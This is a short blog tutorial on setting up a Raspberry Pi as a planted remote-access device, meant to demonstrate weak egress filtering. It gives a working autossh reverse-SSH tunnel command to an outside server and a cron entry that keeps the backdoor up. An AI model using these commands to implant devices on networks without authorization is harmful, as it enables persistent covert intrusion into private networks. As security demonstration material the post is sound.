Persistent Reverse-SSH Tunnel on a RaspberryPi

I have a couple of old Raspberry Pi’s 2 laying around and have been meaning to turn them into “Remote Access Terminals” to demonstrate what happens if you do not do effective egress filtering on your network. At a high level if an attacker can plug in one of these on your network and get internet access they own your network.

Here is a terrible diagram I put together using draw.io to explain:

Untitled Diagram

To set this up you will need the following:

There are plenty of guides on setting this up so I won’t spend time doing that here. Once you have that complete and are on the pi you can run the the following command:
autossh -M 65500 -o ServerAliveInterval=20 -R 2222:localhost:22 root@digitalocean

Autossh will use ports 65500 and 65501 to send echo data over and back between server and host and open an ssh session on the public server to local port 2222 that will tunnel back to the SSH port on the Pi.

Once that is done you can ssh into your public ssh server and run the following command:
ssh -p 2222 pi@127.0.0.1

Congratulations you now have a host you can control from the internet on a private network (That you totally have permission to be plugged into, right?).

back-door

While this works if the pi is has any problems the tunnel will be gone so we will use a cron job to make sure that it is always up.  You can use the following crontab entry that checks if the tunnel is up every minute:

* * * * * pi /usr/bin/screen -S reverse-ssh-tunnel -d -m autossh -M 65500 -i /home/pi/.ssh/id_rsa -o "ServerAliveInterval 20" -o "ServerAliveCountMax 3" -R 2222:localhost:22 root@digitalocean

Reboot the Pi to test and you should be good to go.

Site Footer